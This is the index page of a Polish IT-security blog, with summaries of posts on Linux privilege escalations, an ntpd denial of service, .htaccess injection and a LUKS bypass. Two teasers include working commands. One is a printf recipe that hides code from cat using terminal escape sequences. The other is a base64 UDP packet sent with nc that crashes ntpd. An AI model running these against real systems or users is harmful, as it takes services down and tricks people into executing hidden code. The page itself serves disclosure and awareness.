NFsec Logo

Używanie dockera by przejąć hosta serwera – eskalacja uprawnień?

18/02/2017 (3 dni temu) w Bezpieczeństwo Brak komentarzy.

M

ój administrator idzie z duchem po(d)stępu i podzielił nasz wielki serwer na mniejsze byśmy mogli robić te…, jak one mają… – mikroserwisy. Jako najprostszy i najszybszy sposób dla systemu Ubuntu 16.04 LTS wybrał szybującą w rozwoju technologię, czyli Dockera. Po szybkiej i sprawnej instalacji najnowszej wersji 1.13.1 mój zwykły użytkownik (darkstar) uzyskał możliwość posługiwania się tą technologią poprzez dopisanie go do grupy docker:
[ czytaj całość… ]

LUNAR – Lockdown UNix Auditing and Reporting

08/02/2017 (2 tygodnie temu) w Bezpieczeństwo Brak komentarzy.

L

UNAR jest narzędziem do audytu systemów z rodziny *nix opartym na kilku benchmarkach oraz innych frameworkach. W skryptach źródłowych można znaleźć nawet adnotacje odnoszące się do konkretnych punktów z zaleceń benchmarków. Obsługuje m.in systemy: RHEL 5, 6, 7 (w tym CentOS oraz Scientific Linux); SLES 10, 11, 12; Debian / Ubuntu; Amazon Linux; Solaris 6, 7, 8, 9, 10 oraz 11 oraz Mac OS X. Jak sam autor zaleca, aby mieć największą pewność, że żadne niepowołane zmiany zostaną dokonane w naszym systemie – najlepiej uruchamiać narzędzie w trybie audytu (-a). W ten sposób do wykrytych nieprawidłowości można odnieść się poprzez czytanie konkretnych instrukcji kodu (całość napisana jest w języku powłoki bash) lub wspomnianych wcześniej komentarzy. Gdyby doszło to jakieś pomyłki istnieje możliwość wycofania zmian, ponieważ pliki są backupowane za pomocą cpio.
[ czytaj całość… ]

systemd v228, screen root exploit i globalne problemy z setuid

27/01/2017 (4 tygodnie temu) w Bezpieczeństwo 1 komentarz.

Sebastian Krahmer z SUSE Security Team odkrył lokalny exploit w systemd v228. Przez ten błąd użytkownik znajdujący się w podatnym systemie jest w stanie podnieść swoje uprawnienia do roli administratora. Patrząc na sedno błędu z wysokiego poziomu proces ten jest dość prosty:

1) Systemd używa wartości -1 do reprezentacji nieprawidłowej wartości mode_t (praw dostępu do systemu plików)
2) Przez przypadek wartość ta jest przekazywana podczas tworzenia (open) nowego pliku, co w rezultacie dawało nam plik z ustawionymi wszystkimi bitami dostępu: globalny zapis, globalne wykonanie i najgorsze: setuid dla root.
3) Atakujący może nadpisać ten plik dowolnym programem, ponieważ jest dostępny do zapisu dla wszystkich.
4) Atakujący może wykonać ten plik z wgranym programem, ponieważ jest dostępny do wykonania dla wszystkich.
5) Atakujący wykonuje program z prawami administratora, ponieważ plik posiada setuid dla root.
[ czytaj całość… ]

Wstrzykiwanie .htaccess do aplikacji PHP

22/01/2017 (5 tygodni temu) w Ataki Internetowe, Bezpieczeństwo Brak komentarzy.

M

imo, że nginx zyskuje coraz więcej na popularności, jeśli chodzi o główny serwer serwujący treści w internecie to Apache z jego mod_php nadal jest faworyzowany w większości systemów CMS oraz webaplikacji napisanych w języku PHP. Bardzo częstym błędem jest oddawanie pełnej kontroli takim aplikacjom i ustawianiu dla ich katalogu opcji AllowOverride na wartość All. Poniżej znajduje się kilka przykładów (w większości działają nawet z 7 wersją PHP), które po wstrzyknięciu / umieszczeniu pliku .htaccess do takiego katalogu dają ciekawe efekty:
[ czytaj całość… ]

Ukrywanie szkodliwego kodu w skryptach bash

09/01/2017 w Ataki Internetowe, Bezpieczeństwo Brak komentarzy.

Przez przypadek trafiłem na wpis na wykopie. Idąc tym tropem dotarłem do źródła, w którym możemy znaleźć prosty przepis na stworzenie szkodliwego skryptu w powłoce bash, który z pozoru będzie wyglądał normalnie:

$ printf '#!/bin/bash\necho szkodliwy kod!\nexit\n\033[2Aecho cos tam!\n' > backdoor.sh
$ chmod +x backdoor.sh
$ cat backdoor.sh
#!/bin/bash
echo cos tam!
$ ./backdoor.sh
szkodliwy kod!

Jak to działa? Istnieją specjalne sekwencje znaków, które interpretuje terminal nie wyświetlając ich, ale podejmując daną akcję. Dlaczego takie polecenia, jak: cat, head, tail, more i inne zostają oszukane? Ponieważ sekwencja \033[XA powoduje przesunięcie kursora do góry o X linii nadpisując to, co jest w tej X linii. Przez, co użytkownik widzi zupełnie inny kod niż w rzeczywistości zostanie wykonany. W połączeniu z innymi atakami mogą stanowić kompletny wektor na oszukanie użytkownika sytemu z rodziny *nix.

Więcej informacji: JournalCTL Terminal Escape Injection && Log Injection, Terminal Emulator Security Issues

Nie ufaj X-Forwarded-For

30/12/2016 w Bezpieczeństwo Brak komentarzy.

N

agłówek protokołu HTTP: X-Forwarded-For (XFF) pierwotnie został przedstawiony przez zespół developerów odpowiedzialnych za rozwijanie serwera Squid, jako metoda identyfikacji oryginalnego adresu IP klienta łączącego się do serwera web, poprzez inny serwer proxy lub load balancer. Bez użycia XFF lub innej, podobnej techniki, dowolne połączenie za pośrednictwem proxy, pozostawiłoby jedynie adres IP pochodzący z samego serwera proxy zamieniając go w usługę anonimizującą klientów. W ten sposób, wykrywanie i zapobieganie nieautoryzowanym dostępom, stałoby się znacznie trudniejsze niż w przypadku przekazywania informacji o adresie IP, z którego przyszło żądanie. Przydatność X-Forwarded-For zależy od serwera proxy, który zgodnie z rzeczywistością, powinien przekazać adres IP łączącego się z nim klienta. Z tego powodu, serwery będące za serwerami proxy muszą wiedzieć, które z nich są „godne zaufania”. Niestety, czasami nawet i to nie wystarczy. W najnowszym Sekurak Zine #3 postaram się przedstawić, dlaczego nie powinniśmy na ślepo ufać wartościom pochodzącym z tego nagłówka.

Sytuacja wyścigu w implementacji af_packet.c

10/12/2016 w Bezpieczeństwo Brak komentarzy.

W październiku Phil Oester odkrył lukę w jądrze Linuksa o nazwie Dirty COW, która mogła zostać wykorzystana przez lokalnego napastnika do podniesienia swoich uprawnień do roli administratora. 28.11.2016 Philip Pettersson znalazł i zgłosił do zespołu bezpieczeństwa jądra kolejny błąd, który był obecny w systemie Linux od pięciu lat (2011). 06.12.2016 luka została publicznie ogłoszona. Błąd polega na możliwości sytuacji wyścigu w pliku net/packet/af_packet.c. Sytuacja ta z kolei prowadzi do błędu typu use-after-free w sposobie w jakim implementacja surowych gniazd w podsystemie sieciowym jądra obsługuje synchronizację podczas tworzenia buforu pierścieniowego TPACKET_V3. UAF głównie odnosi się do próby uzyskania dostępu do pamięci po jej zwolnieniu, co może powodować zawieszenie się programu, czy potencjalnie zakończyć się bezwględnym wykonaniem kodu lub nawet przyznać możliwości jego zdalnego wykonania.
[ czytaj całość… ]

Wywałka ntpd jednym pakietem UDP

22/11/2016 w Bezpieczeństwo Brak komentarzy.

N

owy błąd w daemonie NTP pozwala na przeprowadzenie ataku Denial of Service za pomocą jednego, spreparowanego pakietu UDP, który wywołuje null pointer dereference. Atak można przeprowadzić zdalnie, a atakujący nie musi być uwierzytelniony. Cały atak ogranicza się do wysłania na port NTP wiadomości:

echo "FgoAEAAAAAAAAAA2bm9uY2UsIGxhZGRyPVtdOkhyYWdzPTMyLCBsY"\
"WRkcj1bXTpXT1AAMiwgbGFkZHI9W106V09QAAA=" | base64 -d | nc -u -v 127.0.0.1 123

Podatne są wszystkie wersje do ntp-4.2.7p22 z wykluczeniem ntp-4.2.8p9 oraz do ntp-4.3.0 z wykluczeniem ntp-4.3.94. O ile aktywnie utrzymywane systemy operacyjne poradzą sobie z aktualizacją pakietów – ponownie nie wszystkie urządzenia korzystające z wbudowanych systemów będą mogły zostać zaktualizowane. Większość urządzeń nie posiada już wsparcia ze strony producentów lub dostarczenie odpowiedniej poprawki może być bardzo przeciągnięte w czasie. W takich wypadkach należy wyłączyć usługę serwera czasu (jeśli nie jest ona w ogóle potrzebna) lub ograniczyć do niej sieciowy dostęp tylko z zaufanych źródeł.

Więcej informacji: Vulnerability Note VU#633847, CVE-2016-7434

Eskalacja uprawnień poprzez paczkę nginx w Debianie i Ubuntu

17/11/2016 w Bezpieczeństwo Brak komentarzy.

P

akiet nginx w dystrybucjach Debian i Ubuntu systemu Linux jest podatny na eskalację uprawnień poprzez zastosowanie niebezpiecznych praw dostępu do katalogu, gdzie przechowywane są logi serwera WWW. Skutkiem błędnej konfiguracji może być uzyskanie praw administratora przez atakującego, który na przykład wcześniej zdołał skompromitować aplikację internetową uruchomioną na serwerze nginx i uzyskał dostęp do konta www-data lub taki dostęp został mu wcześniej przyznany, aby móc wdrażać aplikacje internetowe. Za pomocą odpowiedniego eksploita jest w stanie podnieść swoje uprawnienia w ciągu 24 godzin za pomocą narzędzia logrotate, które poddaje logi rotacji raz dziennie.

Więcej informacji: CVE-2016-1247, PoC Video

Omijanie uwierzytelniania w mechanizmie szyfrowania dysków LUKS

15/11/2016 w Bezpieczeństwo Brak komentarzy.

B

łąd w implementacji narzędzia cryptsetup używanego do szyfrowania dysków w systemie Linux za pomocą LUKS pozwala atakującemu na ominięcie procedur uwierzytelniania za pomocą. Uwaga. Naciskania klawisza „ENTER” przez 70 sekund. Skutkiem jest otrzymanie powłoki uruchomionej z uprawnieniami administratora. Luka została odkryta przez Hektora Marco – tak, tego samego odpowiedzialnego za znalezienie błędu pozwalającego na ominięcie uwierzytelniania w bootloaderze GRUB2.
[ czytaj całość… ]

Strona 1 z 1912345...1015...Ostatnia »